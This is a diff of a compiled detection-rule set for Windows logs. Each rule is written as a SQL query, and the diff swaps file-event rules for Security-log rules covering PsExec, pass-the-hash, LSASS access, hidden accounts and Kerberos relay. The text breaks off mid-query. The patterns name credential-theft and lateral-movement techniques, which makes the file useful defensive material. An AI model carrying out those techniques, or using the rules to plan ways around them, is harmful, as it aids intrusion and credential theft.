"file_event_win_susp_adsi_cache_usage.yml" + "filename": "win_security_syskey_registry_access.yml" }, { - "title": "Legitimate Application Dropped Script", - "id": "7d604714-e071-49ff-8726-edeb95a70679", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write scripts to disk", - "author": "frack113, Florian Roth", + "title": "Impacket PsExec Execution", + "id": "32d56ea1-417f-44ff-822b-882873f5f43b", + "status": "test", + "description": "Detects execution of Impacket's psexec.py.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" ], - "filename": "file_event_win_legitimate_app_dropping_script.yml" + "filename": "win_security_impacket_psexec.yml" }, { - "title": "Suspicious File Event With Teams Objects", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", - "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "title": "WCE wceaux.dll Access", + "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "status": "test", + "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", + "author": "Thomas Patzke", "tags": [ "attack.credential_access", - "attack.t1528" + "attack.t1003", + "attack.s0005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" ], - "filename": "file_event_win_access_susp_teams.yml" + "filename": "win_security_mal_wceaux_dll.yml" }, { - "title": "Office Macro File Creation From Suspicious Process", - "id": "b1c50487-1967-4315-a026-6491686d860e", - "status": "experimental", - "description": "Detects the creation of a office macro file from a a suspicious process", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "Hidden Local User Creation", + "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "status": "test", + "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" ], - "filename": "file_event_win_office_macro_files_from_susp_process.yml" + "filename": "win_security_hidden_user_creation.yml" }, { - "title": "Suspicious Get-Variable.exe Creation", - "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "title": "Suspicious Scheduled Task Creation", + "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "status": "experimental", - "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", - "author": "frack113", + "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.privilege_escalation", "attack.persistence", - "attack.t1546", - "attack.defense_evasion", - "attack.t1027" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" ], - "filename": "file_event_win_susp_get_variable.yml" + "filename": "win_security_susp_scheduled_task_creation.yml" }, { - "title": "Files With System Process Name In Unsuspected Locations", - "id": "d5866ddf-ce8f-4aea-b28e-d96485a20d3d", + "title": "Operation Wocao Activity - Security", + "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", "status": "test", - "description": "Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64...etc).", - "author": "Sander Wiebing, Tim Shelton, Nasreddine Bencherchali", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", "attack.defense_evasion", - "attack.t1036.005" + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "System processes copied outside their default folders for testing purposes", - "Third party software naming their software with the same names as the processes mentioned here" + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AtBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\backgroundTaskHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\conhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\csrss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dasHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dfrgui.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\dwm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventcreate.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\explorer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\extrac32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\fontdrvhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicli.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\iscsicpl.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\logman.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LogonUI.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\msinfo32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powershell.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regini.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" ], - "filename": "file_event_win_creation_system_file.yml" + "filename": "win_security_apt_wocao.yml" }, { - "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", - "id": "07a99744-56ac-40d2-97b7-2095967b0e03", - "status": "experimental", - "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation" - ], + "title": "Suspicious Computer Account Name Change CVE-2021-42287", + "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", + "status": "test", + "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" ], - "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" + "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" }, { - "title": "Creation of an WerFault.exe in Unusual Folder", - "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "title": "Service Installed By Unusual Client - Security", + "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", "status": "experimental", - "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", - "author": "frack113", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" ], - "filename": "file_event_win_werfault_dll_hijacking.yml" + "filename": "win_security_service_installation_by_unusal_client.yml" }, { - "title": "Potential RipZip Attack on Startup Folder", - "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "title": "Invoke-Obfuscation Via Use Clip - Security", + "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", "status": "experimental", - "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", - "author": "Greg (rule)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "file_event_win_ripzip_attack.yml" + "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" }, { - "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", - "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "title": "KrbRelayUp Attack Pattern", + "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", "status": "experimental", - "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE", + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.privilege_escalation", + "attack.credential_access" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" ], - "filename": "file_event_win_powershell_startup_shortcuts.yml" + "filename": "win_security_susp_krbrelayup.yml" }, { - "title": "ISO File Created Within Temp Folders", - "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", - "status": "experimental", - "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", - "author": "@sam0x90", + "title": "Suspicious PsExec Execution", + "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", + "status": "test", + "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", + "author": "Samir Bousseaden", "tags": [ - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" ], - "filename": "file_event_win_iso_file_mount.yml" + "filename": "win_security_susp_psexec.yml" }, { - "title": "Suspicious MSExchangeMailboxReplication ASPX Write", - "id": "7280c9f3-a5af-45d0-916a-bc01cb4151c9", - "status": "test", - "description": "Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation", - "author": "Florian Roth (Nextron Systems)", + "title": "LSASS Access from Non System Account", + "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "status": "experimental", + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.persistence", - "attack.t1505.003" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\MSExchangeMailboxReplication.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "file_event_win_susp_exchange_aspx_write.yml" + "filename": "win_security_lsass_access_non_system_account.yml" }, { - "title": "UAC Bypass Using Windows Media Player - File", - "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "title": "Reconnaissance Activity", + "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", + "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1087.002", + "attack.t1069.002", + "attack.s0039" ], "falsepositives": [ - "Unknown" + "Administrator activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE 